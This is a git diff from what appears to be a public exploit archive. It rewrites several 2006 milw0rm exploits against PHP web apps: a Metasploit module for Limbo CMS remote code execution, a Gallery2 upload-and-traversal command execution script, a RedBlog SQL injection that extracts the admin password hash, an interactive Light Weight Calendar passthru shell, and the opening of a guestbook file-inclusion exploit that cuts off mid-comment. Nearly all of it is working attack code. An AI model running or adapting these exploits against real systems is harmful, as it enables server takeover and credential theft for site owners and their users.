- my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
- return($self);
-}
-
-sub Exploit {
- my $self = shift;
- my $target_host = $self->GetVar('RHOST');
- my $vhost = $self->GetVar('VHOST') || $target_host;
- my $target_port = $self->GetVar('RPORT');
- my $target_idx = $self->GetVar('TARGET');
- my $target = $self->Targets->[$target_idx];
- my $path = $self->GetVar('RPATH');
- my $cmd = $self->GetVar('EncodedPayload')->RawPayload;
- my ($data);
-
- # Add an echo on each end for easy output capturing
- $cmd = "echo _cmd_beg_;".$cmd.";echo _cmd_end_";
-
- # Replacing all spaces with %20
- $cmd =~ s/ /%20/g;
-
- # Create the get request data
- if ($target_idx == 0) {
- $data = "?option=frontpage&Itemid=phpinfo()";
- } elsif($target_idx == 1) {
- $data = "?option=frontpage&Itemid=system(\$_GET[m])&m=$cmd";
- } elsif($target_idx == 2) {
- $data = "?option=frontpage&Itemid=exec(\$_GET[m])&m=$cmd";
- } elsif($target_idx == 3) {
- $data = "?option=frontpage&Itemid=shell_exec(\$_GET[m])&m=$cmd";
- } elsif($target_idx == 4) {
- $data = "?option=frontpage&Itemid=passthru(\$_GET[m])&m=$cmd";
- }
-
- my $req =
- "GET $path$data HTTP/1.1\r\n".
- "Accept: */*\r\n".
- "User-Agent: Mozilla/4.0 (MetaSploit)\r\n".
- "Host: $vhost\r\n".
- "Connection: Close\r\n".
- "\r\n";
-
- my $s = Msf::Socket::Tcp->new(
- 'PeerAddr' => $target_host,
- 'PeerPort' => $target_port,
- 'SSL' => $self->GetVar('SSL'),
- );
-
- if ($s->IsError){
- $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
- return;
- }
-
- $self->PrintLine("[*] Sending the malicious Limbo request...");
-
- $s->Send($req);
- my $results = $s->Recv(-1, 20);
- $s->Close();
-
- if ($target_idx == 0) {
- if ($results =~ /disable_functions/) {
- $self->PrintLine("[*] Server is vuln!");
- if ($results =~ /system()/) {
- $self->PrintLine("[?] system() is disabled");
- }
- if ($results =~ /shell_exec()/) {
- $self->PrintLine("[?] shell_exec() is disabled");
- }
- if ($results =~ /passthru()/) {
- $self->PrintLine("[?] shell_exec() is disabled");
- }
- if ($results =~ /exec()/) {
- $self->PrintLine("[?] exec() is disabled");
- }
- $self->PrintLine("[*] If safe_mode=on try $vhost$path?option=frontpage&Itemid=include(\$_GET[m])&m=http://PHPSHELL?&");
-
- } else {
- $self->PrintLine("[-] Server NOT vuln!");
- }
- } elsif ($results =~ m/_cmd_beg_(.*)_cmd_end_/ms) {
- my $out = $1;
- $out =~ s/^\s+|\s+$//gs;
- if ($out) {
- $self->PrintLine('----------------------------------------');
- $self->PrintLine('');
- $self->PrintLine($out);
- $self->PrintLine('');
- $self->PrintLine('----------------------------------------');
- }
- } else {
- $self->PrintLine('[-] exploit failed');
- }
-
- return;
-}
-
-1;
-
-# milw0rm.com [2006-03-07]
+##
+# Title: Limbo CMS version 1.x suffers from a remote code execution vulnerability.
+# Name: limbo_cms_1_x.pm
+# License: Artistic/BSD/GPL
+# Info: Trying to get the command execution exploits out of the way on milw0rm.com. M's are always good.
+#
+#
+# - This is an exploit module for the Metasploit Framework, please see
+# http://metasploit.com/projects/Framework for more information.
+##
+
+package Msf::Exploit::limbo_cms_1_x;
+use base "Msf::Exploit";
+use strict;
+use Pex::Text;
+use bytes;
+
+my $advanced = { };
+
+my $info = {
+ 'Name' => 'Limbo CMS version 1.x Code Execution',
+ 'Version' => '$Revision: 1.1 $',
+ 'Authors' => [ 'sirh0t < sirh0t [at] hotmail.com >' ],
+ 'Arch' => [ ],
+ 'OS' => [ ],
+ 'Priv' => 0,
+ 'UserOpts' =>
+ {
+ 'RHOST' => [1, 'ADDR', 'The target address'],
+ 'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
+ 'RPORT' => [1, 'PORT', 'The target port', 80],
+ 'RPATH' => [1, 'DATA', 'Path to the index.php script', ' /limbo/index.php'],
+ 'SSL' => [0, 'BOOL', 'Use SSL'],
+ },
+
+ 'Description' => Pex::Text::Freeform(qq{
+ This module exploits an arbitrary PHP code execution flaw in the Limbo version 1.*. All versions UNPATCHED Limbo 1.x are affected. Bug found by Aleksander Hristov
+}),
+#milw0rm this is your part ;p
+ 'Refs' =>
+ [
+ ['OSVDB', '-----'],
+ ['CVE', '---------'],
+ ['MIL', '125'],
+ ],
+
+ 'Payload' =>
+ {
+ 'Space' => 512,
+ 'Keys' => ['cmd', 'cmd_bash'],
+ },
+
+ 'DefaultTarget' => 1,
+ 'Targets' =>
+ [
+ ['Vulnerably test',0],
+ ['use system()', 1],
+ ['use exec()', 2],
+ ['use shell_exec()',3],
+ ['use passthru()',4],
+ ],
+
+
+ 'Keys' => ['limbo'],
+
+ 'DisclosureDate' => 'Mar 03 2006',
+ };
+
+sub new {
+ my $class = shift;
+ my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
+ return($self);
+}
+
+sub Exploit {
+ my $self = shift;
+ my $target_host = $self->GetVar('RHOST');
+ my $vhost = $self->GetVar('VHOST') || $target_host;
+ my $target_port = $self->GetVar('RPORT');
+ my $target_idx = $self->GetVar('TARGET');
+ my $target = $self->Targets->[$target_idx];
+ my $path = $self->GetVar('RPATH');
+ my $cmd = $self->GetVar('EncodedPayload')->RawPayload;
+ my ($data);
+
+ # Add an echo on each end for easy output capturing
+ $cmd = "echo _cmd_beg_;".$cmd.";echo _cmd_end_";
+
+ # Replacing all spaces with %20
+ $cmd =~ s/ /%20/g;
+
+ # Create the get request data
+ if ($target_idx == 0) {
+ $data = "?option=frontpage&Itemid=phpinfo()";
+ } elsif($target_idx == 1) {
+ $data = "?option=frontpage&Itemid=system(\$_GET[m])&m=$cmd";
+ } elsif($target_idx == 2) {
+ $data = "?option=frontpage&Itemid=exec(\$_GET[m])&m=$cmd";
+ } elsif($target_idx == 3) {
+ $data = "?option=frontpage&Itemid=shell_exec(\$_GET[m])&m=$cmd";
+ } elsif($target_idx == 4) {
+ $data = "?option=frontpage&Itemid=passthru(\$_GET[m])&m=$cmd";
+ }
+
+ my $req =
+ "GET $path$data HTTP/1.1\r\n".
+ "Accept: */*\r\n".
+ "User-Agent: Mozilla/4.0 (MetaSploit)\r\n".
+ "Host: $vhost\r\n".
+ "Connection: Close\r\n".
+ "\r\n";
+
+ my $s = Msf::Socket::Tcp->new(
+ 'PeerAddr' => $target_host,
+ 'PeerPort' => $target_port,
+ 'SSL' => $self->GetVar('SSL'),
+ );
+
+ if ($s->IsError){
+ $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
+ return;
+ }
+
+ $self->PrintLine("[*] Sending the malicious Limbo request...");
+
+ $s->Send($req);
+ my $results = $s->Recv(-1, 20);
+ $s->Close();
+
+ if ($target_idx == 0) {
+ if ($results =~ /disable_functions/) {
+ $self->PrintLine("[*] Server is vuln!");
+ if ($results =~ /system()/) {
+ $self->PrintLine("[?] system() is disabled");
+ }
+ if ($results =~ /shell_exec()/) {
+ $self->PrintLine("[?] shell_exec() is disabled");
+ }
+ if ($results =~ /passthru()/) {
+ $self->PrintLine("[?] shell_exec() is disabled");
+ }
+ if ($results =~ /exec()/) {
+ $self->PrintLine("[?] exec() is disabled");
+ }
+ $self->PrintLine("[*] If safe_mode=on try $vhost$path?option=frontpage&Itemid=include(\$_GET[m])&m=http://PHPSHELL?&");
+
+ } else {
+ $self->PrintLine("[-] Server NOT vuln!");
+ }
+ } elsif ($results =~ m/_cmd_beg_(.*)_cmd_end_/ms) {
+ my $out = $1;
+ $out =~ s/^\s+|\s+$//gs;
+ if ($out) {
+ $self->PrintLine('----------------------------------------');
+ $self->PrintLine('');
+ $self->PrintLine($out);
+ $self->PrintLine('');
+ $self->PrintLine('----------------------------------------');
+ }
+ } else {
+ $self->PrintLine('[-] exploit failed');
+ }
+
+ return;
+}
+
+1;
+
+# milw0rm.com [2006-03-07]
diff --git a/platforms/php/webapps/1566.php b/platforms/php/webapps/1566.php
index 137bf9a75..9ea8f6e2a 100755
--- a/platforms/php/webapps/1566.php
+++ b/platforms/php/webapps/1566.php
@@ -1,204 +1,204 @@ -#!/usr/bin/php -q -d short_open_tag=on -autisticiorg \r\n"; -echo "site: http://retrogod.altervista.org \r\n\r\n"; -echo "-> works with register_globals = On and magic_quotes_gpc = Off \r\n"; - -if ($argc<5) { -echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS \r\n"; -echo "host: target server (ip/hostname) \r\n"; -echo "path: path to gallery2 \r\n"; -echo "user-pass: this exploit needs valid user credentials to upload a \r\n"; -echo " watermark \r\n"; -echo "cmd: a shell command \r\n"; -echo "Options: \r\n"; -echo " -p[port]: specify a port other than 80 \r\n"; -echo " -P[ip:port]: specify a proxy \r\n"; -echo "Examples: \r\n"; -echo "php ".$argv[0]." localhost /gallery2/ user pass cat ./../config.php \r\n"; -echo "php ".$argv[0]." localhost /gallery2/ user pass type .\..\config.php \r\n"; -echo "php ".$argv[0]." localhost /gallery2/ user pass -p81 -P1.1.1.1:80 ls -la\r\n"; -die; -} - -error_reporting(0); -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",5); - -function quick_dump($string) -{ - $result='';$exa='';$cont=0; - for ($i=0; $i<=strlen($string)-1; $i++) - { - if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - //debug - //echo "\r\n".$html; -} - -$host=$argv[1];$path=$argv[2];$user=$argv[3];$pass=$argv[4]; -$cmd="";$port=80;$proxy=""; - -for ($i=5; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") and ($temp<>"-P")) -{$cmd.=" ".$argv[$i];} -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} -$cmd=urlencode($cmd); -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - - -echo "STEP 1 -> Login...\r\n"; -$data ="g2_navId=xebb12f28"; -$data.="&g2_formUrl=http%3A%2F%2F".urlencode($host.$path)."main.php%3Fg2_view%3Dcore.UserAdmin%26g2_subView%3Dcore.UserLogin"; -$data.="&g2_controller=core.UserLogin"; -$data.="&g2_form%5BformName%5D=UserLogin"; -$data.="&g2_form%5Busername%5D=".$user; -$data.="&g2_form%5Bpassword%5D=".$pass; -$data.="&g2_form%5Baction%5D%5Blogin%5D=Login"; -$packet ="POST ".$p."main.php HTTP/1.1\r\n"; -$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; it) Opera 8.50\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -$packet.=$data; -//debug -//echo quick_dump($packet); - -sendpacketii($packet); -if (!eregi("Location:",$html)) {echo "Failed to login...";die;} - else {echo "Login -> OK\r\n";} -$temp=explode("Set-Cookie: ",$html); -$temp2=explode(" ",$temp[1]); -$COOKIE=$temp2[0]; -$temp2=explode(" ",$temp[2]); 
-$COOKIE.=" ".str_replace(";","",$temp2[0]); -echo "COOKIE ->".$COOKIE."\r\n"; - -echo "STEP 2 -> Upload evil file...\r\n"; -$data="------------2xqpvaUR5xYUMAC8KQGMSV -Content-Disposition: form-data; name=\"g2_returnName\" - -user watermarks -------------2xqpvaUR5xYUMAC8KQGMSV -Content-Disposition: form-data; name=\"g2_navId\" - -xebb12f28 -------------2xqpvaUR5xYUMAC8KQGMSV -Content-Disposition: form-data; name=\"g2_formUrl\" - -http://".$host.$path."main.php?g2_view=core.UserAdmin&g2_subView=watermark.UserWatermarks -------------2xqpvaUR5xYUMAC8KQGMSV -Content-Disposition: form-data; name=\"g2_controller\" - -watermark.UserWatermarks -------------2xqpvaUR5xYUMAC8KQGMSV -Content-Disposition: form-data; name=\"g2_form[formName]\" - -UserWatermarks -------------2xqpvaUR5xYUMAC8KQGMSV -Content-Disposition: form-data; name=\"g2_form[1]\"; filename=\"SUNTZUUUUUUU\" -Content-Type: text/plain - - -------------2xqpvaUR5xYUMAC8KQGMSV -Content-Disposition: form-data; name=\"g2_form[action][add]\" - -Add -------------2xqpvaUR5xYUMAC8KQGMSV-- -"; - -$packet="POST ".$p."main.php HTTP/1.1\r\n"; -$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; it) Opera 8.50\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Cookie: ".$COOKIE."\r\n"; -$packet.="Content-Type: multipart/form-data; boundary=----------2xqpvaUR5xYUMAC8KQGMSV\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -$packet.=$data; -//debug -//echo quick_dump($packet); -sendpacketii($packet); - -$two_in_one= array("upgrade","install"); -for ($i=0; $i<=count($two_in_one)-1;$i++) -{ -$step=3+$i; -echo "STEP ".$step." -> Launch commands through ".$two_in_one[$i]." scripts ...\r\n"; -$xpl=urlencode("../../g2data/plugins_data/modules/watermark/SUNTZUUUUUUU".chr(0x00)); -$packet="GET ".$p.$two_in_one[$i]."/index.php?CMD=".$cmd."&stepOrder[]=".$xpl." 
HTTP/1.1\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -//debug -//echo quick_dump($packet); -sendpacketii($packet); -//debug -//echo $html; -if (eregi("\*#\*",$html)) { -$out=explode("*#*",$html); -echo $out[1]; -die ("Exploit succeeded...\r\n"); -} -} -# if you are here... -echo "Exploit failed...\r\n"; -?> - -# milw0rm.com [2006-03-08] +#!/usr/bin/php -q -d short_open_tag=on +autisticiorg \r\n"; +echo "site: http://retrogod.altervista.org \r\n\r\n"; +echo "-> works with register_globals = On and magic_quotes_gpc = Off \r\n"; + +if ($argc<5) { +echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS \r\n"; +echo "host: target server (ip/hostname) \r\n"; +echo "path: path to gallery2 \r\n"; +echo "user-pass: this exploit needs valid user credentials to upload a \r\n"; +echo " watermark \r\n"; +echo "cmd: a shell command \r\n"; +echo "Options: \r\n"; +echo " -p[port]: specify a port other than 80 \r\n"; +echo " -P[ip:port]: specify a proxy \r\n"; +echo "Examples: \r\n"; +echo "php ".$argv[0]." localhost /gallery2/ user pass cat ./../config.php \r\n"; +echo "php ".$argv[0]." localhost /gallery2/ user pass type .\..\config.php \r\n"; +echo "php ".$argv[0]." 
localhost /gallery2/ user pass -p81 -P1.1.1.1:80 ls -la\r\n"; +die; +} + +error_reporting(0); +ini_set("max_execution_time",0); +ini_set("default_socket_timeout",5); + +function quick_dump($string) +{ + $result='';$exa='';$cont=0; + for ($i=0; $i<=strlen($string)-1; $i++) + { + if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + //debug + //echo "\r\n".$html; +} + +$host=$argv[1];$path=$argv[2];$user=$argv[3];$pass=$argv[4]; +$cmd="";$port=80;$proxy=""; + +for ($i=5; $i<=$argc-1; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>"-p") and ($temp<>"-P")) +{$cmd.=" ".$argv[$i];} +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} +$cmd=urlencode($cmd); +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + + +echo "STEP 1 -> Login...\r\n"; +$data ="g2_navId=xebb12f28"; +$data.="&g2_formUrl=http%3A%2F%2F".urlencode($host.$path)."main.php%3Fg2_view%3Dcore.UserAdmin%26g2_subView%3Dcore.UserLogin"; +$data.="&g2_controller=core.UserLogin"; +$data.="&g2_form%5BformName%5D=UserLogin"; +$data.="&g2_form%5Busername%5D=".$user; +$data.="&g2_form%5Bpassword%5D=".$pass; +$data.="&g2_form%5Baction%5D%5Blogin%5D=Login"; +$packet ="POST ".$p."main.php HTTP/1.1\r\n"; +$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; it) Opera 8.50\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +$packet.=$data; +//debug +//echo quick_dump($packet); + +sendpacketii($packet); +if (!eregi("Location:",$html)) {echo "Failed to login...";die;} + else {echo "Login -> OK\r\n";} +$temp=explode("Set-Cookie: ",$html); +$temp2=explode(" ",$temp[1]); +$COOKIE=$temp2[0]; +$temp2=explode(" ",$temp[2]); +$COOKIE.=" ".str_replace(";","",$temp2[0]); +echo "COOKIE ->".$COOKIE."\r\n"; + +echo "STEP 2 -> Upload evil file...\r\n"; +$data="------------2xqpvaUR5xYUMAC8KQGMSV +Content-Disposition: form-data; name=\"g2_returnName\" + +user watermarks +------------2xqpvaUR5xYUMAC8KQGMSV +Content-Disposition: form-data; name=\"g2_navId\" + +xebb12f28 +------------2xqpvaUR5xYUMAC8KQGMSV +Content-Disposition: form-data; name=\"g2_formUrl\" + +http://".$host.$path."main.php?g2_view=core.UserAdmin&g2_subView=watermark.UserWatermarks +------------2xqpvaUR5xYUMAC8KQGMSV +Content-Disposition: form-data; name=\"g2_controller\" + +watermark.UserWatermarks +------------2xqpvaUR5xYUMAC8KQGMSV +Content-Disposition: form-data; name=\"g2_form[formName]\" + +UserWatermarks +------------2xqpvaUR5xYUMAC8KQGMSV +Content-Disposition: form-data; name=\"g2_form[1]\"; 
filename=\"SUNTZUUUUUUU\" +Content-Type: text/plain + + +------------2xqpvaUR5xYUMAC8KQGMSV +Content-Disposition: form-data; name=\"g2_form[action][add]\" + +Add +------------2xqpvaUR5xYUMAC8KQGMSV-- +"; + +$packet="POST ".$p."main.php HTTP/1.1\r\n"; +$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; it) Opera 8.50\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Cookie: ".$COOKIE."\r\n"; +$packet.="Content-Type: multipart/form-data; boundary=----------2xqpvaUR5xYUMAC8KQGMSV\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +$packet.=$data; +//debug +//echo quick_dump($packet); +sendpacketii($packet); + +$two_in_one= array("upgrade","install"); +for ($i=0; $i<=count($two_in_one)-1;$i++) +{ +$step=3+$i; +echo "STEP ".$step." -> Launch commands through ".$two_in_one[$i]." scripts ...\r\n"; +$xpl=urlencode("../../g2data/plugins_data/modules/watermark/SUNTZUUUUUUU".chr(0x00)); +$packet="GET ".$p.$two_in_one[$i]."/index.php?CMD=".$cmd."&stepOrder[]=".$xpl." HTTP/1.1\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +//debug +//echo quick_dump($packet); +sendpacketii($packet); +//debug +//echo $html; +if (eregi("\*#\*",$html)) { +$out=explode("*#*",$html); +echo $out[1]; +die ("Exploit succeeded...\r\n"); +} +} +# if you are here... +echo "Exploit failed...\r\n"; +?> + +# milw0rm.com [2006-03-08] diff --git a/platforms/php/webapps/1567.php b/platforms/php/webapps/1567.php index 4ddfdd468..0da0b9511 100755 --- a/platforms/php/webapps/1567.php +++ b/platforms/php/webapps/1567.php 
@@ -1,79 +1,79 @@ - x128.net oo website : www.x128.net"; -} - -function xss_exploit() -{ - $xss_target = $_SERVER['argv'][1] . "/modules/blog/rss.php"; - $xss_http_get = "?cat_id=x128"; - - $xss_connection = curl_init(); - - if ($_SERVER['argv'][2]) - { - curl_setopt($xss_connection, CURLOPT_TIMEOUT, 8); - curl_setopt($xss_connection, CURLOPT_PROXY, $_SERVER['argv'][2]); - } - - curl_setopt ($xss_connection, CURLOPT_URL, $xss_target . $xss_http_get); - curl_setopt ($xss_connection, CURLOPT_HEADER, 0); - curl_setopt ($xss_connection, CURLOPT_RETURNTRANSFER, 1); - curl_setopt ($xss_connection, CURLOPT_USERAGENT, 'x128'); - - $xss_source = curl_exec($xss_connection) or die("oo error - cannot connect!\n"); - - preg_match("/FROM ([0-9a-zA-Z_]*)posts/", $xss_source, $xss_prefix); - - $xss_http_get = "?cat_id=" . urlencode("0 UNION SELECT 1,config_value,1,1,1,1,1,1 FROM " . $xss_prefix[1] . "general_config/*"); - $xss_source = curl_exec($xss_connection) or die("oo error - cannot connect!\n"); - - curl_setopt ($xss_connection, CURLOPT_URL, $xss_target . $xss_http_get); - - $xss_source = curl_exec($xss_connection) or die("oo error - cannot connect!\n"); - preg_match("/([0-9a-f]{32})<\/title>/", $xss_source, $xss_output); - - if ($xss_output[0]) - { - echo "oo password " . $xss_output[1] . "\n\n"; - echo "oo dafaced ...\n"; - } - - curl_close ($xss_connection); -} - -xss_init(); -xss_header(); -xss_exploit(); -xss_bottom(); -?> - -# milw0rm.com [2006-03-08] +<? 
+error_reporting(E_ERROR); + +function xss_init() +{ + if (!extension_loaded('php_curl')) + { + if (!dl('curl.so') and !dl('php_curl.so') and !dl('php_curl.dll')) + die ("oo error - cannot load curl extension!"); + } +} + +function xss_header() +{ + echo "\noooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo"; + echo " oo ooooooo ooooooo\n"; + echo " oooo oooo o888 o88 888 o888 888o\n"; + echo " 888o888 888 o888 888888888\n"; + echo " o88888o 888 o888 o 888o o888\n"; + echo " o88o o88o o888o o8888oooo88 88ooo88\n"; + echo "ooooooooooooooooooooooooooooo redblog 0.5 exploit ooooooooooooooooooooooooooooo\n"; + echo "oo usage $ php redblog-05-exploit.php [url]\n"; + echo "oo proxy support $ php redblog-05-exploit.php [url] [proxy]:[port]\n"; + echo "oo example $ php redblog-05-exploit.php http://localhost\n"; + echo "oo print the password of the administrator\n\n"; +} + +function xss_bottom() +{ + echo "\noo discover : x128 - alexander wilhelm - 09/03/2006\n"; + echo "oo contact : exploit <at> x128.net oo website : www.x128.net"; +} + +function xss_exploit() +{ + $xss_target = $_SERVER['argv'][1] . "/modules/blog/rss.php"; + $xss_http_get = "?cat_id=x128"; + + $xss_connection = curl_init(); + + if ($_SERVER['argv'][2]) + { + curl_setopt($xss_connection, CURLOPT_TIMEOUT, 8); + curl_setopt($xss_connection, CURLOPT_PROXY, $_SERVER['argv'][2]); + } + + curl_setopt ($xss_connection, CURLOPT_URL, $xss_target . $xss_http_get); + curl_setopt ($xss_connection, CURLOPT_HEADER, 0); + curl_setopt ($xss_connection, CURLOPT_RETURNTRANSFER, 1); + curl_setopt ($xss_connection, CURLOPT_USERAGENT, 'x128'); + + $xss_source = curl_exec($xss_connection) or die("oo error - cannot connect!\n"); + + preg_match("/FROM ([0-9a-zA-Z_]*)posts/", $xss_source, $xss_prefix); + + $xss_http_get = "?cat_id=" . urlencode("0 UNION SELECT 1,config_value,1,1,1,1,1,1 FROM " . $xss_prefix[1] . 
"general_config/*"); + $xss_source = curl_exec($xss_connection) or die("oo error - cannot connect!\n"); + + curl_setopt ($xss_connection, CURLOPT_URL, $xss_target . $xss_http_get); + + $xss_source = curl_exec($xss_connection) or die("oo error - cannot connect!\n"); + preg_match("/<title>([0-9a-f]{32})<\/title>/", $xss_source, $xss_output); + + if ($xss_output[0]) + { + echo "oo password " . $xss_output[1] . "\n\n"; + echo "oo dafaced ...\n"; + } + + curl_close ($xss_connection); +} + +xss_init(); +xss_header(); +xss_exploit(); +xss_bottom(); +?> + +# milw0rm.com [2006-03-08] diff --git a/platforms/php/webapps/1570.pl b/platforms/php/webapps/1570.pl index b0542abfc..86b6733c9 100755 --- a/platforms/php/webapps/1570.pl +++ b/platforms/php/webapps/1570.pl 
@@ -1,43 +1,43 @@ -#!/usr/bin/perl -# -# Light Weight Calendar -# Exploit by Hessam-x (www.hessamx.net) -# -###################################################### -# ___ ___ __ # -# / | \_____ ____ | | __ ___________________ # -#/ ~ \__ \ _/ ___\| |/ // __ \_ __ \___ / # -#\ Y // __ \\ \___| <\ ___/| | \// / # -# \___|_ /(____ /\___ >__|_ \\___ >__| /_____ \ # -# \/ \/ \/ \/ \/ \/ # -# Iran Hackerz Security Team # -# WebSite: www.hackerz.ir # -# # -###################################################### -# Name : Light Weight Calendar # -# version : 1.* # -###################################################### -use LWP::Simple; - -print "-------------------------------------------\n"; -print "= Light Weight Calendar =\n"; -print "= By Hessam-x - www.hackerz.ir =\n"; -print "-------------------------------------------\n\n"; - - print "Target(www.example.com)\> "; - chomp($targ = <STDIN>); - - print "path: (/lwc/)\>"; - chomp($path=<STDIN>); - -while() -{ - - print "command:\>"; - chomp($comd=<STDIN>); - $expl="index.php?hx=".$comd."&date=passthru%28%24_GET%5Bhx%5D%29"; - $page=get("http://".$targ.$path.$expl) || die "[-] Exploit failed ...\n"; - -} - -# milw0rm.com [2006-03-09] +#!/usr/bin/perl +# +# Light Weight Calendar +# Exploit by Hessam-x (www.hessamx.net) +# +###################################################### +# ___ ___ __ # +# / | \_____ ____ | | __ ___________________ # +#/ ~ \__ \ _/ ___\| |/ // __ \_ __ \___ / # +#\ Y // __ \\ \___| <\ ___/| | \// / # +# \___|_ /(____ /\___ >__|_ \\___ >__| /_____ \ # +# \/ \/ \/ \/ \/ \/ # +# Iran Hackerz Security Team # +# WebSite: www.hackerz.ir # +# # +###################################################### +# Name : Light Weight Calendar # +# version : 1.* # +###################################################### +use LWP::Simple; + +print "-------------------------------------------\n"; +print "= Light Weight Calendar =\n"; +print "= By Hessam-x - www.hackerz.ir =\n"; +print 
"-------------------------------------------\n\n"; + + print "Target(www.example.com)\> "; + chomp($targ = <STDIN>); + + print "path: (/lwc/)\>"; + chomp($path=<STDIN>); + +while() +{ + + print "command:\>"; + chomp($comd=<STDIN>); + $expl="index.php?hx=".$comd."&date=passthru%28%24_GET%5Bhx%5D%29"; + $page=get("http://".$targ.$path.$expl) || die "[-] Exploit failed ...\n"; + +} + +# milw0rm.com [2006-03-09] diff --git a/platforms/php/webapps/1575.pl b/platforms/php/webapps/1575.pl index 3c17ad507..0252ecdb9 100755 --- a/platforms/php/webapps/1575.pl +++ b/platforms/php/webapps/1575.pl 
@@ -1,181 +1,181 @@ -#!/usr/bin/perl -use IO::Socket; - -print "guestbook script <= 1.7 exploit\r\n"; -print "rgod rgod\@autistici.org\r\n"; -print "dork: \"powered by guestbook script\"\r\n\r\n"; - -# short explaination: -# we have this code in nearly all scripts: -# ... -# if (isset ($include_files) and is_array ($include_files)) { -# reset ($include_files); -# while(list($key, $val) = each($include_files)) -# { -# -# if ($file_content = include_content($val)) { -# $$key = $file_content; -# } else { -# $$key = '<pre>[' . $txt['txt_file_not_found'] . ': ' . $val . ']</pre>'; -# } -# $tpl->register('guest', $key); -# } -# } -#... -# here is include_content() function: -# -# function include_content($path) -# { -# -# if (is_file($path)) { -# ob_start(); -# -# include($path); -# $content = ob_get_contents(); -# ob_end_clean(); -# } -# -# if (isset($content)) { -# return $content; -# } -# } -# -# you can include code from local resources and (on PHP5, because is_file() -# function support ftp wrappers) remote 